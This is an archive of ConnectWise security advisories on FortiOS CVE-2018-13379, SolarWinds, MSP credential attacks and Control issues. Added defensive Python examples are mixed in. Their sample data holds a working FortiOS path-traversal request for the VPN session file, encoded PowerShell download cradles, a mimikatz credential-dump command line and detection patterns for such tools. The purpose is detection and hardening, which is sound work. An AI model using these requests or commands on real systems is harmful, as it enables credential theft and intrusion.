Advisories Archive
From time to time, ConnectWise will provide communications on broader security related topics that may not be linked to a specific ConnectWise product or vulnerability, but are still of importance to our partner community.
Important Microsoft Exchange Server Vulnerability – Patches Available
Microsoft has released critical patches for Microsoft Exchange Server zero-day vulnerabilities that are being actively exploited by a nation-state affiliated group. These vulnerabilities affect on-premises Exchange Servers 2010, 2013, 2016, and 2019. If you’re hosting an Exchange server, we recommend applying patches immediately for:
More background and details can be found here.
ConnectWise SOC PSA: Fortinet FortiOS Vulnerability
Active exploits of a critical vulnerability in Fortinet’s FortiOS have been observed by the ConnectWise SOC. We urge all partners and clients to review their FortiGate Firewalls and ensure they are fully patched against CVE-2018-13379.
This vulnerability is a path traversal in the FortiOS SSL VPN web portal that allows unauthenticated attackers to read FortiOS system files via a specially crafted HTTP request. Attackers are using it to read the /dev/cmdb/sslvpn_websession file, which exposes the plaintext usernames and passwords of currently logged-in SSL VPN users.
Because SSL VPN accounts are commonly synchronized from Active Directory (AD sync) and credentials are frequently reused, this poses a serious risk of domain and email compromise, and gives the attacker a direct path into client networks via the SSL VPN itself.
Recommendations:
- Patch all affected FortiGate devices immediately
- Reset domain and email credentials for any potentially affected clients
ConnectWise is actively reaching out to partners potentially impacted. This issue is unrelated to ConnectWise products or services.
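As an added example (not from the ConnectWise advisory or from Fortinet), the following Python checks web-portal request lines for the crafted request described above: a directory traversal that escapes the SSL VPN web root and reaches /dev/cmdb/sslvpn_websession. The sample request lines are constructed for illustration and follow the shape of the public exploit; the decode loop handles percent-encoded and double-encoded traversal, which a plain substring match on the file name would miss when the path is encoded.

```python
import re
from urllib.parse import unquote

# Constructed sample request lines (not real FortiGate logs). The first is a
# normal portal login; the other two are traversal attempts that reach the
# session file named in the advisory, once plain and once percent-encoded.
SAMPLE_REQUESTS = [
    "GET /remote/login?lang=en HTTP/1.1",
    "GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1",
    "GET /remote/fgt_lang?lang=%2F..%2F..%2F..%2F..%2F%2Fdev%2Fcmdb%2Fsslvpn_websession HTTP/1.1",
]

TARGET_FILE = "sslvpn_websession"
TRAVERSAL = re.compile(r"\.\.(?:/|$)")


def normalize_target(raw):
    """Percent-decode until the string stops changing (catches double
    encoding) and collapse runs of slashes, so '%2F..%2F%2F%2Fdev' and
    '/..///dev' compare equal."""
    decoded = raw
    for _ in range(3):
        again = unquote(decoded)
        if again == decoded:
            break
        decoded = again
    return re.sub(r"/+", "/", decoded).lower()


def is_websession_read(request_line):
    """True when the request targets the SSL VPN session file via traversal."""
    parts = request_line.split()
    if len(parts) < 2:
        return False
    target = normalize_target(parts[1])
    return TARGET_FILE in target and TRAVERSAL.search(target) is not None


def flag_requests(lines):
    """Return the request lines that should be treated as CVE-2018-13379
    exploitation attempts; each one means the session file was likely read
    and every VPN user logged in at the time needs a credential reset."""
    return [line for line in lines if is_websession_read(line)]


if __name__ == "__main__":
    for hit in flag_requests(SAMPLE_REQUESTS):
        print("exploit attempt:", hit)
```

Run it against exported portal access logs; a single hit is enough to justify the credential reset in the recommendations, since the file is read in full on each successful request.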
Sources:
ConnectWise Control & Iranian hacker activity
February 11, 2021
ConnectWise Control has not been hacked or compromised in any way. An Iranian hacker group, disguising their origin by routing through US/UK/EU IP addresses, obtained instances of ConnectWise Control (formerly ScreenConnect) and used it along with trojan files containing the agent installer to compromise other organizations. Two prominent security research firms have reported this to us independently and we corroborated their findings.
The hacker group compromised the victim organizations using email phishing campaigns resulting in the installation of the ConnectWise Control agent. Subsequently, they used Control's intended functionality to execute commands on the victim’s systems.
ConnectWise takes the abuse of its products and services seriously. While we strive to follow industry best practices, detecting all instances of abuse is a continuing challenge for all in our industry.
Security Advisory - SolarWinds & FireEye
December 15, 2020
As you’ve likely seen reported, SolarWinds discovered a supply chain attack that compromised the update channel of their Orion network management software and distributed a backdoor known as SUNBURST. The malware gives an attacker a foothold on the systems running Orion, which the attacker can leverage to obtain elevated credentials. This compromise was used to target the cybersecurity firm FireEye, as well as multiple U.S. government agencies. For more information, see the advisory from the Cybersecurity & Infrastructure Security Agency.
ConnectWise Actions for our Product Security
ConnectWise does not use any SolarWinds or FireEye products internally. However, we are following the developments closely and validating our processes and environment as new information becomes available.
The security of our products, our partners, and partner data is critically important. While we have no evidence of impact, we are taking the following actions:
- Our Security Operations Center (SOC) continues to monitor the situation. The SOC has blacklisted known IOCs related to the compromised files globally on our SentinelOne consoles.
- Although ConnectWise is not affected, we are using this event to improve our processes and controls.
Recommendations for Partners
If your organization uses SolarWinds, stay current on their recommendations and hotfixes. Review their Security Advisory page for updates.
If you suspect malicious or fraudulent activity within our products, report it to our InfoSec team at security@connectwise.com.
Additional Resources
- Department of Homeland Security Emergency Directive
- FireEye Threat Research on Sunburst
- Microsoft Security Response Center blog
We will continue to provide updates. Please bookmark our Security Trust page for ongoing information.
Thank you,
The ConnectWise InfoSec Team
ConnectWise Security: Public Service Announcement
October 31, 2020
In light of the upcoming elections and recent cyber-attacks on health care systems, there have been reported increases in cyber-attacks on MSPs with attackers seeking to obtain MSP credentials to ConnectWise and similar products by exploiting weaknesses in MSP security protocols and infrastructures.
We are aware of active threats using attack methods to compromise credentials. The safety and security of our partners is a top priority. We encourage all MSPs to review their systems and follow these recommendations:
General Security Best Practices
- Review running processes on all Domain Controllers to ensure no unexpected processes are active. Attackers commonly launch PowerShell with a hidden window and a base64-encoded command line to avoid detection, so inspect command lines, not just process names.
- Enable two-factor authentication (2FA/MFA) on all accounts, including email.
- Check for tools like Cobalt Strike and Mimikatz, which are used by ransomware actors to harvest credentials and maintain persistence.
- If unusual PowerShell activity or unexpected tools are found, reset all user passwords after removal.
- Block traffic to pastebin.com, a known site for malware distribution.
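An added example, not part of the ConnectWise advisory: Python triage of a process listing (for instance one exported from a Domain Controller) that applies the checks above. It decodes PowerShell -EncodedCommand arguments, which are base64 of UTF-16LE text, and then looks for hidden-window flags, download cradles, pastebin.com references and credential-theft tool names in both the raw and the decoded command line. The process list and the encoded payload are constructed; the pattern list is a starting point, not a complete signature set.

```python
import base64
import re

# Constructed sample: (pid, image name, command line) as you might export from
# a Domain Controller. The encoded payload is built here so the base64 is
# guaranteed to be valid UTF-16LE, the encoding PowerShell expects.
ENCODED_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/constructed')"
    .encode("utf-16-le")
).decode("ascii")

SAMPLE_PROCESSES = [
    (4120, "lsass.exe", r"C:\Windows\System32\lsass.exe"),
    (5088, "powershell.exe", "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command Get-ADUser -Filter *"),
    (6012, "powershell.exe", f"powershell.exe -nop -w hidden -enc {ENCODED_PAYLOAD}"),
    (7344, "svchost.exe", "svchost.exe -k netsvcs -p"),
    (8890, "mimikatz.exe", r"C:\Users\Public\mimikatz.exe privilege::debug sekurlsa::logonpasswords"),
]

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
# -e, -ec, -enc and -EncodedCommand are all accepted by powershell.exe.
ENCODED_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{8,})", re.I)

SUSPICIOUS = {
    "hidden-window":   re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no-profile":      re.compile(r"-nop(?:rofile)?\b", re.I),
    "bypass-policy":   re.compile(r"-e(?:p|x|xecutionpolicy)\s+bypass", re.I),
    "download-cradle": re.compile(r"downloadstring|downloadfile|invoke-webrequest|invoke-expression|\biex\b", re.I),
    "pastebin":        re.compile(r"pastebin\.com", re.I),
    "credential-tool": re.compile(r"mimikatz|sekurlsa::|cobalt\s*strike|beacon\.dll", re.I),
}
# Admins legitimately use -NoProfile / -ExecutionPolicy Bypass; these alone are "review".
HIGH = {"encoded-command", "hidden-window", "download-cradle", "pastebin", "credential-tool"}


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument, or None if absent
    or not decodable (wrong alphabet, odd byte count, not UTF-16LE)."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_process(name, cmdline):
    """Return the list of indicators found for one process (empty if clean)."""
    findings = []
    text = f"{name} {cmdline}"
    if name.lower() in POWERSHELL_IMAGES:
        decoded = decode_encoded_command(cmdline)
        if decoded is not None:
            findings.append("encoded-command")
            text += " " + decoded          # scan the decoded script as well
    findings.extend(label for label, pat in SUSPICIOUS.items() if pat.search(text))
    return findings


def triage_processes(processes):
    """Map pid -> (severity, findings) for every process with at least one hit."""
    report = {}
    for pid, name, cmdline in processes:
        findings = triage_process(name, cmdline)
        if findings:
            severity = "high" if HIGH & set(findings) else "review"
            report[pid] = (severity, findings)
    return report


if __name__ == "__main__":
    for pid, (severity, findings) in triage_processes(SAMPLE_PROCESSES).items():
        print(pid, severity, ", ".join(findings))
```

A "high" hit on a Domain Controller is the trigger for the password-reset step in the list above; remove the tooling first, then reset, otherwise the attacker simply harvests the new credentials.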
Security Best Practices for ConnectWise Products
- In addition to MFA, restrict admin page access by IP, use complex passwords, and conduct regular account audits.
- Block access to RDP and similar remote access services from the Internet.
- For ConnectWise Control users, regularly audit the Toolbox directory at C:\Program Files (x86)\ScreenConnect\App_Data\Toolbox for unexpected files.
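The Toolbox audit in the last item is easiest to keep honest with a hash baseline rather than eyeballing the directory. The following Python is an added example, not ConnectWise's own tooling: it records a SHA-256 manifest of the Toolbox on the first run and reports files that were added, removed or changed on later runs. The demo builds a small throwaway Toolbox in a temp directory, so it runs offline; the file names and contents in it are constructed.

```python
import hashlib
import json
import tempfile
from pathlib import Path

# Default location from the advisory; override when Control is installed elsewhere.
TOOLBOX_DIR = Path(r"C:\Program Files (x86)\ScreenConnect\App_Data\Toolbox")


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """Map each file under root (relative, POSIX-style path) to its SHA-256."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def diff_manifests(baseline, current):
    """Files that appeared, disappeared or changed since the baseline."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(k for k in baseline.keys() & current.keys()
                           if baseline[k] != current[k]),
    }


def audit_toolbox(root, baseline_file):
    """First run writes the baseline and returns None; later runs return the
    diff. Store the baseline somewhere a Control admin cannot rewrite it
    (e.g. your RMM's own storage), never inside the Toolbox itself."""
    baseline_file = Path(baseline_file)
    current = build_manifest(root)
    if not baseline_file.exists():
        baseline_file.write_text(json.dumps(current, indent=2))
        return None
    return diff_manifests(json.loads(baseline_file.read_text()), current)


def demo_audit():
    """Constructed demo: build a small Toolbox, baseline it, then simulate an
    attacker replacing an approved script and dropping a new executable."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "approved").mkdir()
        (root / "approved" / "cleanup.ps1").write_text("Get-ChildItem $env:TEMP | Remove-Item -Recurse\n")
        (root / "approved" / "collect_logs.bat").write_text("wevtutil epl System system.evtx\n")
        baseline = build_manifest(root)
        # Tampering: the approved script now pulls a payload, and a lookalike binary appears.
        (root / "approved" / "cleanup.ps1").write_text(
            "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')\n")
        (root / "svchost.exe").write_bytes(b"MZ constructed placeholder, not a real binary")
        return diff_manifests(baseline, build_manifest(root))


if __name__ == "__main__":
    print(json.dumps(demo_audit(), indent=2))
```

Anything in "added" or "modified" that was not put there by a change you approved should be treated as attacker tooling, since every Toolbox item can be pushed to any connected endpoint with one click.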
For more tips and guidance, visit the Security Journey on the ConnectWise University.
We strongly encourage all MSPs to review their security measures and implement the above suggestions. Visit our Trust Site regularly for updates and information.
Thank you for your attention to this important matter.
Stay safe,
ConnectWise InfoSec Team
Update on the ConnectWise Automate API Vulnerability Email Communication from June 22, 2020
June 22, 2020
The security of our partners is of paramount importance to ConnectWise. In line with our EULA, we continuously monitor product behavior to improve functionality and detect potential malicious activity. Following the Automate vulnerability and the hotfix implemented last week, we worked with several partners and identified some non-functioning agents on their Automate servers. While these are usually benign, we assessed the full scope and informed impacted partners so they could take appropriate action.
Update on the ConnectWise PSA™ Customer and Admin Portals
June 22, 2020
We have issued security bulletins on the ConnectWise PSA Customer and Admin portals. Please review the security bulletin tab.
Manage Customer and Admin Portals
June 21, 2020
Dear Partners,
Trusted advisors in our community have responsibly disclosed a potential issue involving the Manage Customer and Admin Portals. Out of an abundance of caution, we have placed both portals under maintenance while we address these reports and will follow with a Security Bulletin.
The Customer Portal remains accessible to those using external validation applications such as Google or Microsoft login. We anticipate an update by mid-day (ET) on Monday, June 22.
Thank you,
Tom Greco
Information Security Director
Security Updates for ConnectWise Control and ConnectWise Automate
May 15, 2020
ConnectWise Control
Earlier today, we identified a potential phishing scam that uses a lookalike (spoofed) ScreenConnect URL to lure recipients to an attacker-controlled website.
If you received this or a similar email, do not click any links and delete the email immediately. We have reported the malicious activity to the authorities.
If you accessed the malicious link, we recommend changing the credentials of any account you used or provided.
Always check URLs for slight spelling errors, which often indicate phishing. ConnectWise will never proactively email you to initiate a password change or confirm MFA enablement.
Thank you,
The ConnectWise Team
ConnectWise Automate
Earlier this afternoon, we were alerted to two attempted intrusions into on-prem Automate accounts via partner Admin Accounts that were not using MFA.
We strongly encourage updating your Automate system to version 2020.1 or higher. This version enforces MFA and complex passwords. Documentation is linked here.
If you need time to install the update, assign Admin permissions to a user with MFA enabled and delete the original Admin account. Contact support for assistance.
Thank you,
The Automate Team
Multi-Factor Authentication Details
MFA is enabled by default in versions 2020.1 and higher for users logging in with local credentials. Before upgrading, ensure:
- Email settings are configured.
- Each user has a unique and valid email address in their profile.
For more information, refer to the Multi-Factor Authentication for Automate documentation.
To prepare:
- Configure email settings. If concerned about notifications or using PSA integration, refer to Control Ticket Messages to silence alerts.
- Go to System > Users and Contacts > Users and ensure all users have a valid email address.
ConnectWise Control's Cloud Password Reset / MFA Risk has been Mitigated
February 5, 2020
On February 4, 2020, Huntress Labs contacted our ConnectWise Control team with a potential risk involving password resets and multi-factor authentication (MFA). Within two hours, our team mitigated the issue.
The issue was limited to the cloud.screenconnect.com logon, which is used only for admin accounts, and exploiting it required access to the partner admin user’s mailbox. The password reset flow emailed a reset link to the admin user and, once the reset was completed, signed the user in directly. The concern was that an attacker with access to that mailbox could reset the password and obtain a logged-in session without ever being challenged for MFA.
Password resets now require re-authentication, including MFA if configured, which mitigates this risk.
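To make the difference concrete, here is an added Python example (not ConnectWise's code, and not a description of their implementation) that models both reset flows side by side: the reported behaviour, where completing the reset hands back a session, and the mitigated behaviour, where the reset only changes the password and the user must authenticate again, MFA included. Tokens are single use and expire, and only their hashes are stored. The MFA check uses a static code in place of TOTP, an assumption made to keep the example offline.

```python
import hashlib
import hmac
import os
import secrets
import time


class Account:
    """Password hashed with PBKDF2-HMAC-SHA256; mfa_code stands in for a TOTP
    seed (assumption: a static six-digit code replaces real TOTP here)."""

    def __init__(self, email, password, mfa_code):
        self.email = email
        self.mfa_code = mfa_code
        self.set_password(password)

    @staticmethod
    def _hash(password, salt):
        return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

    def set_password(self, password):
        self.salt = os.urandom(16)
        self.pw_hash = self._hash(password, self.salt)

    def check_password(self, password):
        return hmac.compare_digest(self.pw_hash, self._hash(password, self.salt))

    def check_mfa(self, code):
        return hmac.compare_digest(self.mfa_code.encode(), code.encode())


class AuthService:
    RESET_TTL_SECONDS = 15 * 60

    def __init__(self):
        self.accounts = {}       # email -> Account
        self.reset_tokens = {}   # sha256(token) -> (email, expires_at); single use
        self.sessions = {}       # session id -> email

    def request_reset(self, email):
        """Single-use, expiring token; only its hash is stored. The token
        itself is what the reset email would carry."""
        token = secrets.token_urlsafe(32)
        key = hashlib.sha256(token.encode()).hexdigest()
        self.reset_tokens[key] = (email, time.time() + self.RESET_TTL_SECONDS)
        return token

    def _consume_reset_token(self, token):
        key = hashlib.sha256(token.encode()).hexdigest()
        entry = self.reset_tokens.pop(key, None)      # pop: a token works once
        if entry is None or entry[1] < time.time():
            raise PermissionError("invalid or expired reset token")
        return entry[0]

    def complete_reset_vulnerable(self, token, new_password):
        """Reported behaviour: finishing the reset signs the user in, so
        whoever controls the mailbox gets a session without seeing MFA."""
        email = self._consume_reset_token(token)
        self.accounts[email].set_password(new_password)
        return self._issue_session(email)

    def complete_reset_hardened(self, token, new_password):
        """Mitigation: the reset changes the password and nothing else.
        Existing sessions are revoked; the user must log in again, which
        re-runs the MFA check."""
        email = self._consume_reset_token(token)
        self.accounts[email].set_password(new_password)
        self._revoke_sessions(email)
        return None

    def login(self, email, password, mfa_code):
        acct = self.accounts.get(email)
        if acct is None or not acct.check_password(password):
            raise PermissionError("bad credentials")
        if not acct.check_mfa(mfa_code):
            raise PermissionError("MFA failed")
        return self._issue_session(email)

    def _issue_session(self, email):
        sid = secrets.token_urlsafe(32)
        self.sessions[sid] = email
        return sid

    def _revoke_sessions(self, email):
        for sid in [s for s, e in self.sessions.items() if e == email]:
            del self.sessions[sid]


def attempt_login(svc, email, password, mfa_code):
    try:
        return svc.login(email, password, mfa_code) in svc.sessions
    except PermissionError:
        return False


def attempt_reset(svc, token, new_password):
    try:
        svc.complete_reset_hardened(token, new_password)
        return True
    except PermissionError:
        return False


def demo():
    """An attacker with mailbox access runs both flows; returns what each yields."""
    svc = AuthService()
    admin = "admin@example.invalid"
    svc.accounts[admin] = Account(admin, "original-password", "123456")
    vuln_session = svc.complete_reset_vulnerable(svc.request_reset(admin), "attacker-pw-1")
    logged_in_without_mfa = vuln_session in svc.sessions
    token = svc.request_reset(admin)
    hardened_result = svc.complete_reset_hardened(token, "attacker-pw-2")
    return {
        "service": svc,
        "admin": admin,
        "logged_in_without_mfa": logged_in_without_mfa,
        "hardened_result": hardened_result,
        "old_session_revoked": vuln_session not in svc.sessions,
        "used_token": token,
    }
```

The property to test in your own reset flow is the last one the demo shows: after a hardened reset the attacker holds a valid new password and still cannot get a session without the second factor, and any session they previously obtained is gone.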
We have verified our mitigation and have asked Huntress Labs to verify as well.
For further questions or concerns, please contact Security@ConnectWise.com.
An Open Letter From Jason Magee Regarding The Bishop Fox Report Findings
January 24, 2020
Earlier this week, a story was published about potential security vulnerabilities with ConnectWise Control. In the spirit of transparency, I wanted to provide an update and outline what has been done and what our ongoing efforts are to ensure the security of our products, your business, and your customers.
In late September, ConnectWise received notification from a security consulting organization identifying eight potential vulnerabilities in ConnectWise Control. While many were considered low risk, we resolved six of them by October 2, 2019.
We proactively manage security through product updates, team education, and collaboration with third-party experts. Here’s what we’ve done:
- Passed an independent SOC 2 Type 2 audit.
- Conduct regular internal and external penetration tests, ethical hacker training, OWASP processes, and vulnerability assessments.
- Implemented behavior analysis tools, machine learning for anomaly detection, and are launching a bug bounty program. MFA and SSO are being rolled out across the platform.
- Invested in a developer security training curriculum in Q4 2019.
- Launched the ConnectWise Security Trust site on January 21, 2020.
- Engaged GuidePoint Security, LLC to validate patches and confirm mitigation. A matrix of vulnerabilities and responses has been published.
- One remaining issue involves Cross-site Scripting (XSS) related to Control Administrator customization. This is considered low risk but will be removed from trial offerings.
- The final issue concerns Security Headers. While not implemented, other security layers address the reported threats.
We will continue to post updates on our Security Trust site. I encourage you to check it regularly for the latest information and updates from our work with GuidePoint Security, LLC.
In our conversations with Huntress Labs, Kyle Hanslovan, CEO of Huntress Labs, shared his perspective on our findings.
“Bugs happen. And it’s not about when bugs happen, but it’s about what you do when they happen. We were happy to work with CRN earlier this week to confirm that ConnectWise had already patched 6 of the 8 items found. I think three things matter in this scenario: Were the bugs acknowledged, were the bugs fixed and was the company passionate about fixing them for the right reasons? I think ConnectWise came through on all three things, and after our positive conversation on January 23, we’re excited about continuing to work with ConnectWise and other vendors for the benefit of the channel as a whole.”
I want to assure our community that we understand the trust you place in our products and people. We take that trust seriously. You have our unrelenting commitment to security and transparency, and we appreciate your questions and feedback to our continuous improvement.
Updated Statement Regarding The Bishop Fox Report Findings
January 23, 2020
ConnectWise takes cybersecurity seriously and we realize that rumored and confirmed security incidents create stress and concern for our partners. Our partners and vendors can use Security@ConnectWise.com to report suspected security incidents or inquire about potential issues related to our products.
As part of our commitment to cybersecurity, ConnectWise recently passed an independent SOC 2 Type 2 audit. We regularly conduct penetration tests, implement ethical hacker training, follow OWASP processes, and run vulnerability assessments. We’ve also deployed tools to detect misuse, begun using machine learning for anomaly detection, and are launching a bug bounty program. MFA and SSO are being rolled out across the platform.
Immediately after CRN published articles on January 21, 2020, about potential vulnerabilities in ConnectWise Control, we reached out to Huntress Labs to discuss their analysis. The conversation was collaborative and constructive.
We also hired GuidePoint Security, LLC to assess the findings from Bishop Fox and Huntress Labs and conduct an independent vulnerability assessment. We will share more information as it becomes available.
We believe that mitigating cybersecurity threats starts with understanding them. Please review the FAQ about the security of ConnectWise Control in relation to the findings.
Original Statement Regarding The Bishop Fox Report Findings
January 22, 2020
In late September, ConnectWise received notification from Bishop Fox, a security consulting firm, about vulnerabilities in ConnectWise Control. We engaged in discussions with them and requested additional information to replicate their findings.
Bishop Fox could not provide further details as the attack chains were conceptual. Both parties agreed that no active exploits had occurred.
We took their insights seriously and resolved 6 of the 8 items by October 2, 2019. On January 21, 2020, we re-tested those items and confirmed they are secure. We plan to resolve a seventh item soon and consider the final item to pose no credible threat.
ConnectWise views security as a dynamic challenge and remains committed to optimizing protection for our partners. Please contact us at security@connectwise.com with any questions or concerns.